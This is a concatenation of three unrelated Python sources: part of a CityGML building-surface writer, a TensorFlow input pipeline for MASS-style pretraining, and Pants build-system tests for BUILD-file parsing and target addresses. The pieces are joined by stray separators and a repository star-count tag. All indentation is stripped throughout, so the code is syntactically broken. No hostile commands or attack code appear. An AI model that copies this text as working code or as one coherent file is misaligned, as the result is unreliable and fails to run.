lodXMultiSurface = etree.SubElement(semanticSurface, "{%s}lod3MultiSurface" % ns_bldg)
elif LOD == 2:
lodXMultiSurface = etree.SubElement(semanticSurface, "{%s}lod2MultiSurface" % ns_bldg)
else:
lodXMultiSurface = etree.SubElement(semanticSurface, "{%s}lod2MultiSurface" % ns_bldg)
MultiSurface = etree.SubElement(lodXMultiSurface, "{%s}MultiSurface" % ns_gml)
surfaceMember = etree.SubElement(MultiSurface, "{%s}surfaceMember" % ns_gml)
Polygon = etree.SubElement(surfaceMember, "{%s}Polygon" % ns_gml)
if ASSIGNID:
Polygon.attrib['{%s}id' % ns_gml] = str(uuid.uuid4())
PolygonExterior = etree.SubElement(Polygon, "{%s}exterior" % ns_gml)
LinearRing = etree.SubElement(PolygonExterior, "{%s}LinearRing" % ns_gml)
posList = etree.SubElement(LinearRing, "{%s}posList" % ns_gml)
posList.text = coords
if interior and interior[0] is not None:
for hole in interior:
PolygonInterior = etree.SubElement(Polygon, "{%s}interior" % ns_gml)
LinearRing = etree.SubElement(PolygonInterior, "{%s}LinearRing" % ns_gml)
posList = etree.SubElement(LinearRing, "{%s}posList" % ns_gml)
posList.text = hole
if opening:
dooropening = opening[0]
if dooropening != []:
gmlopening = etree.SubElement(semanticSurface, "{%s}opening" % ns_bldg)
gmldoor = etree.SubElement(gmlopening, "{%s}Door" % ns_bldg)
lod3MultiSurface = etree.SubElement(gmldoor, "{%s}lod3MultiSurface" % ns_bldg)
DoorMultiSurface = etree.SubElement(lod3MultiSurface, "{%s}MultiSurface" % ns_gml)
DoorsurfaceMember = etree.SubElement(DoorMultiSurface, "{%s}surfaceMember" % ns_gml)
DoorPolygon = etree.SubElement(DoorsurfaceMember, "{%s}Polygon" % ns_gml)
if ASSIGNID:
DoorPolygon.attrib['{%s}id' % ns_gml] = str(uuid.uuid4())
DoorPolygonExterior = etree.SubElement(DoorPolygon, "{%s}exterior" % ns_gml)
DoorLinearRing = etree.SubElement(DoorPolygonExterior, "{%s}LinearRing" % ns_gml)
DoorposList = etree.SubElement(DoorLinearRing, "{%s}posList" % ns_gml)
DoorposList.text = GMLreversedRing(dooropening['ring'])
if len(opening[1]) > 0:
for win in opening[1]:
#print win
gmlopening = etree.SubElement(semanticSurface, "{%s}opening" % ns_bldg)
gmlwin = etree.SubElement(gmlopening, "{%s}Window" % ns_bldg)
lod3MultiSurface = etree.SubElement(gmlwin, "{%s}lod3MultiSurface" % ns_bldg)
DoorMultiSurface = etree.SubElement(lod3MultiSurface, "{%s}MultiSurface" % ns_gml)
DoorsurfaceMember = etree.SubElement(DoorMultiSurface, "{%s}surfaceMember" % ns_gml)
DoorPolygon = etree.SubElement(DoorsurfaceMember, "{%s}Polygon" % ns_gml)
if ASSIGNID:
DoorPolygon.attrib['{%s}id' % ns_gml] = str(uuid.uuid4())
DoorPolygonExterior = etree.SubElement(DoorPolygon, "{%s}exterior" % ns_gml)
DoorLinearRing = etree.SubElement(DoorPolygonExterior, "{%s}LinearRing" % ns_gml)
DoorposList = etree.SubElement(DoorLinearRing, "{%s}posList" % ns_gml)
DoorposList.text = GMLreversedRing(win['ring'])
def multiSurface2(bldg, coords, semantics, interior=None, LOD=None, window=None):
"""
Write a surface with input coordinates.
Input: coordinates of the LinearRing.
Output: MultiSurface.
"""
boundedBy = etree.SubElement(bldg, "{%s}boundedBy" % ns_bldg)
semanticSurface = etree.SubElement(boundedBy, "{%s}%s" % (ns_bldg, semantics))
if LOD == 3:
lodXMultiSurface = etree.SubElement(semanticSurface, "{%s}lod3MultiSurface" % ns_bldg)
elif LOD == 2:
lodXMultiSurface = etree.SubElement(semanticSurface, "{%s}lod2MultiSurface" % ns_bldg)
else:
lodXMultiSurface = etree.SubElement(semanticSurface, "{%s}lod2MultiSurface" % ns_bldg)
MultiSurface = etree.SubElement(lodXMultiSurface, "{%s}MultiSurface" % ns_gml)
surfaceMember = etree.SubElement(MultiSurface, "{%s}surfaceMember" % ns_gml)
Polygon = etree.SubElement(surfaceMember, "{%s}Polygon" % ns_gml)
if ASSIGNID:
Polygon.attrib['{%s}id' % ns_gml] = str(uuid.uuid4())
PolygonExterior = etree.SubElement(Polygon, "{%s}exterior" % ns_gml)
LinearRing = etree.SubElement(PolygonExterior, "{%s}LinearRing" % ns_gml)
posList = etree.SubElement(LinearRing, "{%s}posList" % ns_gml)
posList.text = coords
if interior and interior[0] is not None:
for hole in interior:
PolygonInterior = etree.SubElement(Polygon, "{%s}interior" % ns_gml)
LinearRing = etree.SubElement(PolygonInterior, "{%s}LinearRing" % ns_gml)
posList = etree.SubElement(LinearRing, "{%s}posList" % ns_gml)
posList.text = hole
if window:
if len(window) > 0:
for win in window:
#print win
gmlopening = etree.SubElement(semanticSurface, "{%s}opening" % ns_bldg)
gmlwin = etree.SubElement(gmlopening, "{%s}Window" % ns_bldg)
lod3MultiSurface = etree.SubElement(gmlwin, "{%s}lod3MultiSurface" % ns_bldg)
DoorMultiSurface = etree.SubElement(lod3MultiSurface, "{%s}MultiSurface" % ns_gml)
DoorsurfaceMember = etree.SubElement(DoorMultiSurface, "{%s}surfaceMember" % ns_gml)
DoorPolygon = etree.SubElement(DoorsurfaceMember, "{%s}Polygon" % ns_gml)
if ASSIGNID:
DoorPolygon.attrib['{%s}id' % ns_gml] = str(uuid.uuid4())
DoorPolygonExterior = etree.SubElement(DoorPolygon, "{%s}exterior" % ns_gml)
DoorLinearRing = etree.SubElement(DoorPolygonExterior, "{%s}LinearRing" % ns_gml)
DoorposList = etree.SubElement(DoorLinearRing, "{%s}posList" % ns_gml)
DoorposList.text = win
def multiSurfaceWithEmbrasure(bldg, coords, semantics, interior=None, LOD=None, embO=None):
"""
Write a surface with input coordinates, taking into account the embrasures.
Input: coordinates of the LinearRing.
Output: CompositeSurface.
"""
boundedBy = etree.SubElement(bldg, "{%s}boundedBy" % ns_bldg)
semanticSurface = etree.SubElement(boundedBy, "{%s}%s" % (ns_bldg, semantics))
if LOD == 3:
lodXMultiSurface = etree.SubElement(semanticSurface, "{%s}lod3MultiSurface" % ns_bldg)
elif LOD == 2:
lodXMultiSurface = etree.SubElement(semanticSurface, "{%s}lod2MultiSurface" % ns_bldg)
else:
lodXMultiSurface = etree.SubElement(semanticSurface, "{%s}lod2MultiSurface" % ns_bldg)
MultiSurface = etree.SubElement(lodXMultiSurface, "{%s}MultiSurface" % ns_gml)
surfaceMember = etree.SubElement(MultiSurface, "{%s}surfaceMember" % ns_gml)
Polygon = etree.SubElement(surfaceMember, "{%s}Polygon" % ns_gml)
if ASSIGNID:
Polygon.attrib['{%s}id' % ns_gml] = str(uuid.uuid4())
PolygonExterior = etree.SubElement(Polygon, "{%s}exterior" % ns_gml)
LinearRing = etree.SubElement(PolygonExterior, "{%s}LinearRing" % ns_gml)
posList = etree.SubElement(LinearRing, "{%s}posList" % ns_gml)
posList.text = coords
if interior and interior[0] is not None:
for hole in interior:
PolygonInterior = etree.SubElement(Polygon, "{%s}interior" % ns_gml)
LinearRing = etree.SubElement(PolygonInterior, "{%s}LinearRing" % ns_gml)
posList = etree.SubElement(LinearRing, "{%s}posList" % ns_gml)
posList.text = hole
for opening in embO:
for s in opening['surfaces']:
# MultiSurface = etree.SubElement(lodXMultiSurface, "{%s}MultiSurface" % ns_gml)
surfaceMember = etree.SubElement(MultiSurface, "{%s}surfaceMember" % ns_gml)
Polygon = etree.SubElement(surfaceMember, "{%s}Polygon" % ns_gml)
if ASSIGNID:
Polygon.attrib['{%s}id' % ns_gml] = str(uuid.uuid4())
PolygonExterior = etree.SubElement(Polygon, "{%s}exterior" % ns_gml)
LinearRing = etree.SubElement(PolygonExterior, "{%s}LinearRing" % ns_gml)
posList = etree.SubElement(LinearRing, "{%s}posList" % ns_gml)
posList.text = s
for o in opening['openings']:
gmlopening = etree.SubElement(semanticSurface, "{%s}opening" % ns_bldg)
if opening['type'] == 'Door':
gmldoor = etree.SubElement(gmlopening, "{%s}Door" % ns_bldg)
elif opening['type'] == 'Window':
gmldoor = etree.SubElement(gmlopening, "{%s}Window" % ns_bldg)
else:
raise ValueError("Door or window allowed.")
lod3MultiSurface = etree.SubElement(gmldoor, "{%s}lod3MultiSurface" % ns_bldg)
DoorMultiSurface = etree.SubElement(lod3MultiSurface, "{%s}MultiSurface" % ns_gml)
DoorsurfaceMember = etree.SubElement(DoorMultiSurface, "{%s}surfaceMember" % ns_gml)
DoorPolygon = etree.SubElement(DoorsurfaceMember, "{%s}Polygon" % ns_gml)
if ASSIGNID:
DoorPolygon.attrib['{%s}id' % ns_gml] = str(uuid.uuid4())
DoorPolygonExterior = etree.SubElement(DoorPolygon, "{%s}exterior" % ns_gml)
DoorLinearRing = etree.SubElement(DoorPolygonExterior, "{%s}LinearRing" % ns_gml)
DoorposList = etree.SubElement(DoorLinearRing, "{%s}posList" % ns_gml)
DoorposList.text = o#['ring']
def multiSurfaceLOD0(bldg, coords, footedge):
"""
Write a surface with input coordinates.
Input: coordinates of the LinearRing.
Output: MultiSurface.
"""
if footedge == "footprint":
lod0MultiSurface = etree.SubElement(bldg, "{%s}lod0FootPrint" % ns_bldg)
elif footedge == "roofedge":
lod0MultiSurface = etree.SubElement(bldg, "{%s}lod0RoofEdge" % ns_bldg)
MultiSurface = etree.SubElement(lod0MultiSurface, "{%s}MultiSurface" % ns_gml)
surfaceMember = etree.SubElement(MultiSurface, "{%s}surfaceMember" % | |
<gh_stars>0
"""Create mass input function for TPUEstimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
from absl import flags
import absl.logging as _logging # pylint: disable=unused-import
import numpy as np
import tensorflow as tf
# pylint: disable=g-import-not-at-top
try:
from google3.experimental.users.zihangd.pretrain.data_utils import type_cast
from google3.experimental.users.zihangd.pretrain.data_utils import sparse_to_dense
from google3.experimental.users.zihangd.pretrain.mlm_input_func_builder import chunk_to_sequence
from google3.experimental.users.zihangd.pretrain.mlm_input_func_builder import create_target_mapping
from google3.experimental.users.zihangd.pretrain.mlm_input_func_builder import discrepancy_correction
except ImportError as e:
from data_utils import type_cast
from data_utils import sparse_to_dense
from mlm_input_func_builder import chunk_to_sequence
from mlm_input_func_builder import create_target_mapping
from mlm_input_func_builder import discrepancy_correction
# pylint: enable=g-import-not-at-top
FLAGS = flags.FLAGS
flags.DEFINE_bool("origin_pos", default=False,
help="Use the original enc position for the dec inputs.")
def _idx_pair_to_mask(beg_indices, end_indices, inputs, tgt_len, num_predict):
"""Turn begin and end indices into actual mask."""
non_func_mask = tf.not_equal(inputs, FLAGS.eos_id)
all_indices = tf.where(
non_func_mask,
tf.range(tgt_len, dtype=tf.int64),
tf.constant(-1, shape=[tgt_len], dtype=tf.int64))
candidate_matrix = tf.cast(
tf.logical_and(
all_indices[None, :] >= beg_indices[:, None],
all_indices[None, :] < end_indices[:, None]),
tf.float32)
cumsum_matrix = tf.reshape(
tf.cumsum(tf.reshape(candidate_matrix, [-1])),
[-1, tgt_len])
masked_matrix = (tf.cast(cumsum_matrix <= num_predict, tf.float32)
* candidate_matrix)
target_mask = tf.reduce_sum(masked_matrix, axis=0)
is_masked = tf.cast(target_mask, tf.bool)
segment_range = tf.cast(tf.range(1, tf.shape(candidate_matrix)[0] + 1),
dtype=candidate_matrix.dtype)
segment_matrix = segment_range[:, None] * candidate_matrix
segment_ids = tf.reduce_sum(segment_matrix * masked_matrix, axis=0)
segment_ids = tf.cast(segment_ids, dtype=inputs.dtype)
pos_mat = tf.cumsum(candidate_matrix, axis=1, exclusive=True)
pos_seq = tf.reduce_sum(pos_mat * masked_matrix, axis=0)
return is_masked, segment_ids, pos_seq
def _token_span_mask(inputs, tgt_len, num_predict):
"""Sample token spans as prediction targets."""
mask_alpha = tgt_len / num_predict
round_to_int = lambda x: tf.cast(x, tf.int64)
# Sample span lengths from a zipf distribution
span_len_seq = np.arange(FLAGS.min_tok, FLAGS.max_tok + 1)
probs = np.array([1.0 / (i + 1) for i in span_len_seq])
probs /= np.sum(probs)
logits = tf.constant(np.log(probs), dtype=tf.float32)
span_lens = tf.random.categorical(
logits=logits[None],
num_samples=num_predict,
dtype=tf.int64,
)[0] + FLAGS.min_tok
# Sample the ratio [0.0, 1.0) of left context lengths
span_lens_float = tf.cast(span_lens, tf.float32)
left_ratio = tf.random.uniform(shape=[num_predict], minval=0.0, maxval=1.0)
left_ctx_len = left_ratio * span_lens_float * (mask_alpha - 1)
left_ctx_len = round_to_int(left_ctx_len)
# Compute the offset from left start to the right end
right_offset = round_to_int(span_lens_float * mask_alpha) - left_ctx_len
# Get the actual begin and end indices
beg_indices = (tf.cumsum(left_ctx_len) +
tf.cumsum(right_offset, exclusive=True))
end_indices = beg_indices + span_lens
# Remove out of range indices
valid_idx_mask = end_indices <= tgt_len
beg_indices = tf.boolean_mask(beg_indices, valid_idx_mask)
end_indices = tf.boolean_mask(end_indices, valid_idx_mask)
# Shuffle valid indices
num_valid = tf.cast(tf.shape(beg_indices)[0], tf.int64)
order = tf.random_shuffle(tf.range(num_valid, dtype=tf.int64))
beg_indices = tf.gather(beg_indices, order)
end_indices = tf.gather(end_indices, order)
return _idx_pair_to_mask(beg_indices, end_indices, inputs, tgt_len,
num_predict)
def create_mass_target(example, seq_len, num_predict, use_bfloat16):
"""docs."""
inputs = example["inputs"]
# sample mask
is_masked, segment_ids, pos_seq = _token_span_mask(
inputs, seq_len, num_predict)
# get masked input (encoder input)
masked_input = discrepancy_correction(inputs, is_masked, seq_len)
example["enc_inp"] = tf.reshape(masked_input, [seq_len])
example["enc_pos"] = tf.range(seq_len, dtype=pos_seq.dtype)
if FLAGS.origin_pos:
pos_seq = example["enc_pos"] - 1
# create target mapping
create_target_mapping(example, is_masked, seq_len, num_predict,
target=inputs, dec_seg=segment_ids, dec_pos=pos_seq,
dec_type=example["type_id"])
# example["dec_pos"] = tf.range(num_predict, dtype=pos_seq.dtype)
# construct decoder input
target = example["target"]
eos_tensor = tf.constant(FLAGS.eos_id, shape=[1], dtype=target.dtype)
dec_inp = tf.concat([eos_tensor, target[:-1]], 0)
seg_ids = example["dec_seg"]
eos_mask = tf.not_equal(tf.concat([seg_ids[:1], seg_ids[:-1]], 0), seg_ids)
dec_inp = tf.where(eos_mask,
tf.broadcast_to(eos_tensor, [num_predict]),
dec_inp)
example["dec_inp"] = dec_inp
# type cast for example
type_cast(example, use_bfloat16)
for k, v in example.items():
tf.logging.info("%s: %s", k, v)
return example
def mass_process(dataset, seq_len, num_predict, use_bfloat16):
"""Process input tfrecords into proper format for MASS training."""
dataset = chunk_to_sequence(dataset, seq_len)
# Create mass target
create_mass_target_mapper = functools.partial(
create_mass_target,
seq_len=seq_len,
num_predict=num_predict,
use_bfloat16=use_bfloat16)
dataset = dataset.map(create_mass_target_mapper, num_parallel_calls=64)
return dataset
def get_record_parser():
"""Config tfrecord parser."""
def parser(record):
"""function used to parse tfrecord."""
record_spec = {
"inputs": tf.VarLenFeature(tf.int64),
"type_id": tf.FixedLenFeature([1], tf.int64),
}
# retrieve serialized example
example = tf.parse_single_example(
serialized=record,
features=record_spec)
inputs = example["inputs"]
inp_len = tf.shape(inputs)[0]
# expand type id to full length
example["type_id"] = tf.broadcast_to(example["type_id"], [inp_len])
# convert all sparse example to dense
example = sparse_to_dense(example)
return example
return parser
def parse_record(dataset,
parser,
is_training,
num_threads=64,
file_shuffle_size=None,
record_shuffle_size=None):
"""Parse tfrecords in a dataset."""
if is_training:
# file-level shuffle
if file_shuffle_size and file_shuffle_size > 1:
tf.logging.info("File level shuffle with size %d", file_shuffle_size)
dataset = dataset.shuffle(file_shuffle_size)
# `cycle_length` is the number of parallel files that get read.
cycle_length = min(8, file_shuffle_size)
tf.logging.info("Interleave %d files", cycle_length)
# `sloppy` mode means that the interleaving is not exact. This adds
# even more randomness to the training pipeline.
dataset = dataset.apply(
tf.contrib.data.parallel_interleave(
tf.data.TFRecordDataset,
sloppy=True,
cycle_length=cycle_length))
if record_shuffle_size and record_shuffle_size > 1:
tf.logging.info("Record level shuffle with size %d", record_shuffle_size)
dataset = dataset.shuffle(buffer_size=record_shuffle_size)
dataset = dataset.map(parser, num_parallel_calls=num_threads)
dataset = dataset.cache().repeat()
else:
dataset = tf.data.TFRecordDataset(dataset)
dataset = dataset.map(parser)
return dataset
def sent_mass_dataset(params,
file_names,
num_hosts,
num_core_per_host,
seq_len,
num_predict,
is_training,
use_bfloat16=False,
num_threads=64,
record_shuffle_size=4096,
sequence_shuffle_size=2048):
"""Get sentence level mass dataset."""
bsz_per_core = params["batch_size"]
if num_hosts > 1:
host_id = params["context"].current_host
else:
host_id = 0
##### Split input files across hosts
if len(file_names) >= num_hosts:
file_paths = file_names[host_id::num_hosts]
else:
file_paths = file_names
tf.logging.info("Host %d handles %d files:", host_id, len(file_paths))
##### Parse records
dataset = tf.data.Dataset.from_tensor_slices(file_paths)
dataset = parse_record(dataset=dataset,
parser=get_record_parser(),
is_training=is_training,
num_threads=num_threads,
file_shuffle_size=len(file_paths),
record_shuffle_size=record_shuffle_size)
# process dataset
dataset = mass_process(dataset, seq_len, num_predict, use_bfloat16)
# Sequence level shuffle
if is_training and sequence_shuffle_size:
tf.logging.info("Seqeunce level shuffle with size %d",
sequence_shuffle_size)
dataset = dataset.shuffle(buffer_size=sequence_shuffle_size)
# batching
dataset = dataset.batch(bsz_per_core, drop_remainder=True)
# Prefetch
dataset = dataset.prefetch(num_core_per_host)
return dataset
def semidoc_mass_dataset(params,
file_names,
num_hosts,
num_core_per_host,
seq_len,
num_predict,
is_training,
use_bfloat16=False,
num_threads=64,
record_shuffle_size=256,
sequence_shuffle_size=2048):
# pylint: disable=g-doc-args
"""Get semi-doc level mass dataset.
Notes:
- Each sequence comes from the same document (except for boundary cases).
This is different from the standard sent-level mass dataset.
- No consecutivity is ensured across batches, which is different from the
standard doc-level mass dataset.
- Effectively, semi-doc dataset maintains short range (seq_len) dependency,
which is more random than doc-level and less random than sent-level.
Returns:
a tf.data.Dataset
"""
# pylint: enable=g-doc-args
bsz_per_core = params["batch_size"]
if num_hosts > 1:
host_id = params["context"].current_host
else:
host_id = 0
##### Split input files across hosts
if len(file_names) >= num_hosts:
file_paths = file_names[host_id::num_hosts]
else:
file_paths = file_names
tf.logging.info("Host %d handles %d files:", host_id, len(file_paths))
##### Parse records
dataset = tf.data.Dataset.from_tensor_slices(file_paths)
dataset = parse_record(dataset=dataset,
parser=get_record_parser(),
is_training=is_training,
num_threads=num_threads,
file_shuffle_size=len(file_paths),
record_shuffle_size=record_shuffle_size)
# process dataset
dataset = mass_process(dataset, seq_len, num_predict, use_bfloat16)
# Sequence level shuffle
if is_training and sequence_shuffle_size:
tf.logging.info("Seqeunce level shuffle with size %d",
sequence_shuffle_size)
dataset = dataset.shuffle(buffer_size=sequence_shuffle_size)
# batching
dataset = dataset.batch(bsz_per_core, drop_remainder=True)
# Prefetch
dataset = dataset.prefetch(num_core_per_host)
return dataset
def doc_mass_dataset(params,
file_names,
num_hosts,
num_core_per_host,
seq_len,
num_predict,
is_training,
use_bfloat16=False,
num_threads=64,
record_shuffle_size=256):
"""Get document level mass dataset."""
bsz_per_core = params["batch_size"]
if num_hosts > 1:
host_id = params["context"].current_host
else:
host_id = 0
##### Split input files across hosts
if len(file_names) >= num_hosts:
file_paths = file_names[host_id::num_hosts]
else:
file_paths = file_names
tf.logging.info("Host %d handles %d files:", host_id, len(file_paths))
##### Create dataset from file_paths
dataset = tf.data.Dataset.from_tensor_slices(file_paths)
if len(file_paths) // bsz_per_core >= 2:
##### Enough input files, so do file-level sharding shard
# Split the dataset into `bsz_per_core` disjoint shards
shards = [dataset.shard(bsz_per_core, i) for i in range(bsz_per_core)]
# Parse records
file_shuffle_size = (len(file_paths) + bsz_per_core - 1) // bsz_per_core
parse_shard = functools.partial(
parse_record,
parser=get_record_parser(),
is_training=is_training,
num_threads=num_threads,
file_shuffle_size=file_shuffle_size,
record_shuffle_size=record_shuffle_size)
shards = [parse_shard(dataset=shard) for shard in shards]
else:
##### Not enough input files, so do record-level sharding
# Parse records
dataset = parse_record(dataset,
parser=get_record_parser(),
is_training=is_training,
num_threads=num_threads,
file_shuffle_size=len(file_names),
record_shuffle_size=record_shuffle_size)
# Split the dataset into `bsz_per_core` disjoint shards
shards = [dataset.shard(bsz_per_core, i) for i in range(bsz_per_core)]
# process each shard
process_shard = functools.partial(mass_process,
seq_len=seq_len,
num_predict=num_predict,
use_bfloat16=use_bfloat16)
shards = [process_shard(dataset=shard) for shard in shards]
# merge shards into a single batched dataset
def batch_zipped_dataset(*features):
"""Stack a list of homogeneous inputs from a zipped dataset into one."""
new_feature = {}
for key in features[0].keys():
tensor_list = [f[key] for f in features]
new_feature[key] = tf.stack(tensor_list, axis=0) # [sum bsz, length]
return new_feature
dataset = tf.data.Dataset.zip(tuple(shards))
dataset = dataset.map(batch_zipped_dataset)
# Prefetch
dataset = dataset.prefetch(num_core_per_host)
return dataset
def get_input_fn(
doc_dir,
semi_dir,
sent_dir,
split,
uncased,
seq_len,
num_predict,
bsz_per_host,
num_hosts=1,
num_core_per_host=1,
use_bfloat16=False,
**kwargs):
"""Create Estimator input function."""
def dir_to_paths(data_dir, data_type):
"""Get data file paths in the given dir."""
file_paths = []
if data_dir:
tf.logging.info("=" * 120)
case_str = "uncased." if uncased else ""
glob_base = "data.{}.{}.{}tfrecord*".format(split, data_type, case_str)
for idx, dir_path in enumerate(data_dir.split(",")):
glob = os.path.join(dir_path, glob_base)
cur_file_paths = sorted(tf.io.gfile.glob(glob))
file_paths += cur_file_paths
tf.logging.info("[%d] Data glob: %s", idx, glob)
tf.logging.info("[%d] Num of file path: %d", idx, len(cur_file_paths))
| |
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import re
from textwrap import dedent
from typing import Iterable, cast
import pytest
from pants.base.exceptions import ResolveError
from pants.base.specs import (
AddressLiteralSpec,
AddressSpec,
AddressSpecs,
AscendantAddresses,
DescendantAddresses,
MaybeEmptySiblingAddresses,
SiblingAddresses,
)
from pants.build_graph.build_file_aliases import BuildFileAliases
from pants.engine.addresses import Address, Addresses, AddressInput, BuildFileAddress
from pants.engine.fs import DigestContents, FileContent, PathGlobs
from pants.engine.internals.build_files import (
AddressFamilyDir,
BuildFileOptions,
evaluate_preludes,
parse_address_family,
)
from pants.engine.internals.parametrize import Parametrize
from pants.engine.internals.parser import BuildFilePreludeSymbols, Parser
from pants.engine.internals.scheduler import ExecutionError
from pants.engine.internals.target_adaptor import TargetAdaptor
from pants.engine.rules import Get, rule
from pants.engine.target import (
Dependencies,
GeneratedTargets,
GenerateTargetsRequest,
MultipleSourcesField,
SingleSourceField,
SourcesPaths,
SourcesPathsRequest,
StringField,
Tags,
Target,
TargetGenerator,
_generate_file_level_targets,
)
from pants.engine.unions import UnionMembership, UnionRule
from pants.testutil.rule_runner import (
MockGet,
QueryRule,
RuleRunner,
engine_error,
run_rule_with_mocks,
)
from pants.util.frozendict import FrozenDict
def test_parse_address_family_empty() -> None:
"""Test that parsing an empty BUILD file results in an empty AddressFamily."""
af = run_rule_with_mocks(
parse_address_family,
rule_args=[
Parser(build_root="", target_type_aliases=[], object_aliases=BuildFileAliases()),
BuildFileOptions(("BUILD",)),
BuildFilePreludeSymbols(FrozenDict()),
AddressFamilyDir("/dev/null"),
],
mock_gets=[
MockGet(
output_type=DigestContents,
input_type=PathGlobs,
mock=lambda _: DigestContents([FileContent(path="/dev/null/BUILD", content=b"")]),
),
],
)
assert len(af.name_to_target_adaptors) == 0
def run_prelude_parsing_rule(prelude_content: str) -> BuildFilePreludeSymbols:
symbols = run_rule_with_mocks(
evaluate_preludes,
rule_args=[BuildFileOptions((), prelude_globs=("prelude",))],
mock_gets=[
MockGet(
output_type=DigestContents,
input_type=PathGlobs,
mock=lambda _: DigestContents(
[FileContent(path="/dev/null/prelude", content=prelude_content.encode())]
),
),
],
)
return cast(BuildFilePreludeSymbols, symbols)
def test_prelude_parsing_good() -> None:
result = run_prelude_parsing_rule("def foo(): return 1")
assert result.symbols["foo"]() == 1
def test_prelude_parsing_syntax_error() -> None:
with pytest.raises(
Exception, match="Error parsing prelude file /dev/null/prelude: name 'blah' is not defined"
):
run_prelude_parsing_rule("blah")
def test_prelude_parsing_illegal_import() -> None:
prelude_content = dedent(
"""\
import os
def make_target():
python_sources()
"""
)
with pytest.raises(
Exception,
match="Import used in /dev/null/prelude at line 1\\. Import statements are banned",
):
run_prelude_parsing_rule(prelude_content)
class ResolveField(StringField):
alias = "resolve"
class MockTgt(Target):
alias = "mock_tgt"
core_fields = (Dependencies, MultipleSourcesField, Tags, ResolveField)
class MockGeneratedTarget(Target):
alias = "generated"
core_fields = (
Dependencies,
ResolveField,
SingleSourceField,
Tags,
)
class MockTargetGenerator(TargetGenerator):
alias = "generator"
core_fields = (Dependencies, MultipleSourcesField, Tags)
copied_fields = (Tags,)
moved_fields = (ResolveField,)
class MockGenerateTargetsRequest(GenerateTargetsRequest):
generate_from = MockTargetGenerator
# TODO: This method duplicates the builtin `generate_file_targets`, with the exception that it
# intentionally generates both using file addresses and generated addresses. When we remove
# `use_generated_address_syntax=True`, we should remove this implementation and have
# `MockTargetGenerator` subclass `TargetFilesGenerator` instead.
@rule
async def generate_mock_generated_target(
request: MockGenerateTargetsRequest,
union_membership: UnionMembership,
) -> GeneratedTargets:
paths = await Get(SourcesPaths, SourcesPathsRequest(request.generator[MultipleSourcesField]))
# Generate using both "file address" and "generated target" syntax.
return GeneratedTargets(
request.generator,
[
*_generate_file_level_targets(
MockGeneratedTarget,
request.generator,
paths.files,
request.template_address,
request.template,
request.overrides,
union_membership,
add_dependencies_on_all_siblings=True,
use_generated_address_syntax=False,
).values(),
*_generate_file_level_targets(
MockGeneratedTarget,
request.generator,
paths.files,
request.template_address,
request.template,
request.overrides,
union_membership,
add_dependencies_on_all_siblings=True,
use_generated_address_syntax=True,
).values(),
],
)
def test_resolve_address() -> None:
rule_runner = RuleRunner(rules=[QueryRule(Address, (AddressInput,))])
rule_runner.write_files({"a/b/c.txt": "", "f.txt": ""})
def assert_is_expected(address_input: AddressInput, expected: Address) -> None:
assert rule_runner.request(Address, [address_input]) == expected
assert_is_expected(
AddressInput("a/b/c.txt"), Address("a/b", target_name=None, relative_file_path="c.txt")
)
assert_is_expected(
AddressInput("a/b"), Address("a/b", target_name=None, relative_file_path=None)
)
assert_is_expected(AddressInput("a/b", target_component="c"), Address("a/b", target_name="c"))
assert_is_expected(
AddressInput("a/b/c.txt", target_component="c"),
Address("a/b", relative_file_path="c.txt", target_name="c"),
)
# Top-level addresses will not have a path_component, unless they are a file address.
assert_is_expected(
AddressInput("f.txt", target_component="original"),
Address("", relative_file_path="f.txt", target_name="original"),
)
assert_is_expected(AddressInput("", target_component="t"), Address("", target_name="t"))
with pytest.raises(ExecutionError) as exc:
rule_runner.request(Address, [AddressInput("a/b/fake")])
assert "'a/b/fake' does not exist on disk" in str(exc.value)
@pytest.fixture
def target_adaptor_rule_runner() -> RuleRunner:
return RuleRunner(rules=[QueryRule(TargetAdaptor, (Address,))], target_types=[MockTgt])
def test_target_adaptor_parsed_correctly(target_adaptor_rule_runner: RuleRunner) -> None:
target_adaptor_rule_runner.write_files(
{
"helloworld/dir/BUILD": dedent(
"""\
mock_tgt(
fake_field=42,
dependencies=[
# Because we don't follow dependencies or even parse dependencies, this
# self-cycle should be fine.
":dir",
":sibling",
"helloworld/util",
"helloworld/util:tests",
],
build_file_dir=f"build file's dir is: {build_file_dir()}"
)
"""
)
}
)
addr = Address("helloworld/dir")
target_adaptor = target_adaptor_rule_runner.request(TargetAdaptor, [addr])
assert target_adaptor.name == "dir"
assert target_adaptor.type_alias == "mock_tgt"
assert target_adaptor.kwargs["dependencies"] == [
":dir",
":sibling",
"helloworld/util",
"helloworld/util:tests",
]
# NB: TargetAdaptors do not validate what fields are valid. The Target API should error
# when encountering this, but it's fine at this stage.
assert target_adaptor.kwargs["fake_field"] == 42
assert target_adaptor.kwargs["build_file_dir"] == "build file's dir is: helloworld/dir"
def test_target_adaptor_not_found(target_adaptor_rule_runner: RuleRunner) -> None:
with pytest.raises(ExecutionError) as exc:
target_adaptor_rule_runner.request(TargetAdaptor, [Address("helloworld")])
assert "Directory \\'helloworld\\' does not contain any BUILD files" in str(exc)
target_adaptor_rule_runner.write_files({"helloworld/BUILD": "mock_tgt(name='other_tgt')"})
expected_rx_str = re.escape(
"'helloworld' was not found in namespace 'helloworld'. Did you mean one of:\n :other_tgt"
)
with pytest.raises(ExecutionError, match=expected_rx_str):
target_adaptor_rule_runner.request(TargetAdaptor, [Address("helloworld")])
def test_build_file_address() -> None:
rule_runner = RuleRunner(
rules=[QueryRule(BuildFileAddress, (Address,))], target_types=[MockTgt]
)
rule_runner.write_files({"helloworld/BUILD.ext": "mock_tgt()"})
def assert_bfa_resolved(address: Address) -> None:
expected_bfa = BuildFileAddress(address, "helloworld/BUILD.ext")
bfa = rule_runner.request(BuildFileAddress, [address])
assert bfa == expected_bfa
assert_bfa_resolved(Address("helloworld"))
# Generated targets should use their target generator's BUILD file.
assert_bfa_resolved(Address("helloworld", generated_name="f.txt"))
assert_bfa_resolved(Address("helloworld", relative_file_path="f.txt"))
@pytest.fixture
def address_specs_rule_runner() -> RuleRunner:
return RuleRunner(
rules=[
generate_mock_generated_target,
UnionRule(GenerateTargetsRequest, MockGenerateTargetsRequest),
QueryRule(Addresses, [AddressSpecs]),
],
objects={"parametrize": Parametrize},
target_types=[MockTgt, MockGeneratedTarget, MockTargetGenerator],
)
def resolve_address_specs(
rule_runner: RuleRunner,
specs: Iterable[AddressSpec],
) -> set[Address]:
